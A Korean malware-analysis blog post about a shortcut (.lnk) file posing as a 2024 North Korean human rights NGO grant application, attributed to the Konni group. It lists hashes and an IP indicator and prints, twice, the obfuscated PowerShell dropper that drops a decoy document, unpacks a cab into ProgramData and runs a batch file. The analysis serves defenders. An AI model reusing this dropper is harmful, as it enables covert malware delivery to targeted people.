북한 해킹 그룹인 Konni(코니)로 추정 이 되는 2024년 북한인권 민간단체 전략활동 지원사업 신청서.lnk(2024.6.11)
Contents
오늘은 북한의 해킹 그룹인 Konni(코니)로 추정이 되는 2024년 북한인권 민간단체 전략활동 지원사업 신청서.lnk에 대해 글을 적어 보겠습니다. 일단 해당 악성코드의 해쉬값은 다음과 같습니다.
파일명:2024년 북한인권 민간단체 전략활동 지원사업 신청서.lnk
사이즈:33.0 MB
MD5:cfffb45df8f05d1cb5d9d95fd5a83e9e
SHA-1:4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944
SHA-256:00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
일단 해당 파워셀에 포함된 코드는 다음과 같습니다.
/c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~ 5,1%(%)a4(q)w7afej:(~)2,1%%a4qw(7)afej:~8,1(%)%a4q(w)7a fej:~0,1%%a(4)qw7afej:~4,1%%a4q(w)7afej:~7,1%(%)a(4)qw7a fej:~9,1%%(a)4qw7afej:~0,1%%a4qw7(a)fej:~11,1%%a4(q)w7afe j:~11,1% -%a4q(w)7afej:~8,1%%a4qw(7)afej:~12,1%%(a)4qw7afej: ~10,1%%a4q(w)7afej:~3,1%%a4qw(7)afej:~2,1%%a4(q)w7afej:~8,1%% a(4)qw7afej:~7,1%%a4qw7(a)fej:~1,1%%a4(q)w7afej:~6,1%%a4qw7(a )fej:~11,1%%(a)4q(w)7afej:~0,1% %a4q(w)7afej:~9(,)1%%a4qw(7)af ej:~12,1%%a4qw(7)afej:~3,1%%a4(q)w7afej:~3,1%%(a)4qw7(a)fej:~0 ,1%%a4qw7(a)fej:~10,1% "$(N)iQttN1 = Get(-)Location;if($NiQ(t)tN1 -Mat ch 'System(3)2' -or $NiQ(t)tN1 -Mat(c)h 'Prog(r)am Files') {$N(i)QttN1 = '%temp%'};$W7plh7D(3)zZI=@('(.)lnk');$urhL(T)9eZ3Vc = Get-ChildItem (- )Path $NiQtt(N)1 -Recurse *(.)* -File | wher(e) {$_.exten(s)ion -in $W7p (l)h7D3zZI} | where(-)object {$_.length -e(q) 0x0210C(C)CC} | Select-(O) bject -Expand(P)roper(t)y FullName;$aqucL5(h)psgw_ = New-Ob(j)ect System .IO.(F)ileStream($urhLT9eZ3Vc, [System.IO(.)FileMode]::Open, [System.IO( .)FileAccess]::Read);$a(q)ucL5hpsgw_.Seek(0x00(0)01A0D, [System.IO.See(k )Origin]::Begin);$cqcRL(0P)BMTfs = Ne(w)-Object byte[] 0x0000ABF6;($)aqu cL5hp(s)gw_.Read($cqcRL0PBM(T)fs, 0, 0x000(0)ABF6);$smR(W)m5tMSPXA = $ur hLT9eZ(3)Vc.replace('(.)lnk','(.)hwpx');sc $smRW(m)5tMSPXA $cqcR(L)0PBMT fs -En(c)oding Byte;& $(s)mRWm5tMSPXA;$aqu(c)L5hpsgw_.Seek(0(x)0000C603, [System.IO(.)SeekOrigin]::Be(g)in);$pyZmuKvG=(N)ew-Object byte[] 0x00000 6(8)0;($)aqucL5hpsgw_(.)Read($pyZmuKvG, 0, 0x000(0)0680);$aqucL5h(p)sgw_ .Close();Remove(-)Item -Pat(h) $u(r)hLT9eZ3Vc -Force;$xGE_47GiT6=$env:pr ogramdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oy(Y)sDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' (+) 'ab';sc $oyYsDB(u)AJ $p(y)ZmuKvG -Encoding Byte;ex(p) and $oyYsDBuAJ -f:* $xGE(_)47GiT6;$fXoeoY(o)=$xGE_47Gi(T)6 + '\parkonA.b ' (+) 'at';&$fXoeoYo;Remove(-)Item -Path $oyYsDBuAJ -Force;" iconlocation: (.)hwpx …
파일명:2024년 북한인권 민간단체 전략활동 지원사업 신청서.lnk
사이즈:33.0 MB
MD5:cfffb45df8f05d1cb5d9d95fd5a83e9e
SHA-1:4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944
SHA-256:00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
일단 해당 파워셀에 포함된 코드는 다음과 같습니다.
/c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~ 5,1%(%)a4(q)w7afej:(~)2,1%%a4qw(7)afej:~8,1(%)%a4q(w)7a fej:~0,1%%a(4)qw7afej:~4,1%%a4q(w)7afej:~7,1%(%)a(4)qw7a fej:~9,1%%(a)4qw7afej:~0,1%%a4qw7(a)fej:~11,1%%a4(q)w7afe j:~11,1% -%a4q(w)7afej:~8,1%%a4qw(7)afej:~12,1%%(a)4qw7afej: ~10,1%%a4q(w)7afej:~3,1%%a4qw(7)afej:~2,1%%a4(q)w7afej:~8,1%% a(4)qw7afej:~7,1%%a4qw7(a)fej:~1,1%%a4(q)w7afej:~6,1%%a4qw7(a )fej:~11,1%%(a)4q(w)7afej:~0,1% %a4q(w)7afej:~9(,)1%%a4qw(7)af ej:~12,1%%a4qw(7)afej:~3,1%%a4(q)w7afej:~3,1%%(a)4qw7(a)fej:~0 ,1%%a4qw7(a)fej:~10,1% "$(N)iQttN1 = Get(-)Location;if($NiQ(t)tN1 -Mat ch 'System(3)2' -or $NiQ(t)tN1 -Mat(c)h 'Prog(r)am Files') {$N(i)QttN1 = '%temp%'};$W7plh7D(3)zZI=@('(.)lnk');$urhL(T)9eZ3Vc = Get-ChildItem (- )Path $NiQtt(N)1 -Recurse *(.)* -File | wher(e) {$_.exten(s)ion -in $W7p (l)h7D3zZI} | where(-)object {$_.length -e(q) 0x0210C(C)CC} | Select-(O) bject -Expand(P)roper(t)y FullName;$aqucL5(h)psgw_ = New-Ob(j)ect System .IO.(F)ileStream($urhLT9eZ3Vc, [System.IO(.)FileMode]::Open, [System.IO( .)FileAccess]::Read);$a(q)ucL5hpsgw_.Seek(0x00(0)01A0D, [System.IO.See(k )Origin]::Begin);$cqcRL(0P)BMTfs = Ne(w)-Object byte[] 0x0000ABF6;($)aqu cL5hp(s)gw_.Read($cqcRL0PBM(T)fs, 0, 0x000(0)ABF6);$smR(W)m5tMSPXA = $ur hLT9eZ(3)Vc.replace('(.)lnk','(.)hwpx');sc $smRW(m)5tMSPXA $cqcR(L)0PBMT fs -En(c)oding Byte;& $(s)mRWm5tMSPXA;$aqu(c)L5hpsgw_.Seek(0(x)0000C603, [System.IO(.)SeekOrigin]::Be(g)in);$pyZmuKvG=(N)ew-Object byte[] 0x00000 6(8)0;($)aqucL5hpsgw_(.)Read($pyZmuKvG, 0, 0x000(0)0680);$aqucL5h(p)sgw_ .Close();Remove(-)Item -Pat(h) $u(r)hLT9eZ3Vc -Force;$xGE_47GiT6=$env:pr ogramdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oy(Y)sDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' (+) 'ab';sc $oyYsDB(u)AJ $p(y)ZmuKvG -Encoding Byte;ex(p) and $oyYsDBuAJ -f:* $xGE(_)47GiT6;$fXoeoY(o)=$xGE_47Gi(T)6 + '\parkonA.b ' (+) 'at';&$fXoeoYo;Remove(-)Item -Path $oyYsDBuAJ -Force;" iconlocation: (.)hwpx …
IoC
00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37
183.111.174.68
4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944
cfffb45df8f05d1cb5d9d95fd5a83e9e
183.111.174.68
4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944
cfffb45df8f05d1cb5d9d95fd5a83e9e